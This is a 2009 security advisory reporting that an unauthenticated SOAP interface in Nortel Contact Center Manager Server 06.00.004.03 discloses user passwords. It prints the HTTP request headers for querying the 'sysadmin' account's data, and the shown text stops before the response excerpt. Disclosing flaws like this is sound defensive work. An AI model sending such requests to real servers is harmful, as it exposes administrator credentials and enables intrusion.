Nortel Contact Center Manager Server Password Disclosure Vulnerability
28 May 2009
Summary
The Nortel Contact Center Manager Server web application provides a SOAP interface. This interface does not need authorisation and responds to certain requests with sensitive information.
Vulnerable Systems:
* Nortel Contact Center Manager Server version 06.00.004.03
The following SOAP request queries the user data for the user "sysadmin":
---
POST /Common/WebServices/SOAPWrapperCommon/SOAPWrapperCommonWS.asmx HTTP/1.1
Host: 10.1.2.3
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://SoapWrapperCommon.CCMA.Applications.Nortel.com/SOAPWrapperCommon_UsersWS_GetServers_Wrapper"
Content-Length: 661
The following is an excerpt of the response to the previous query. It contains the user sysadmin with the corresponding password (password, server IP address, and server name has been changed):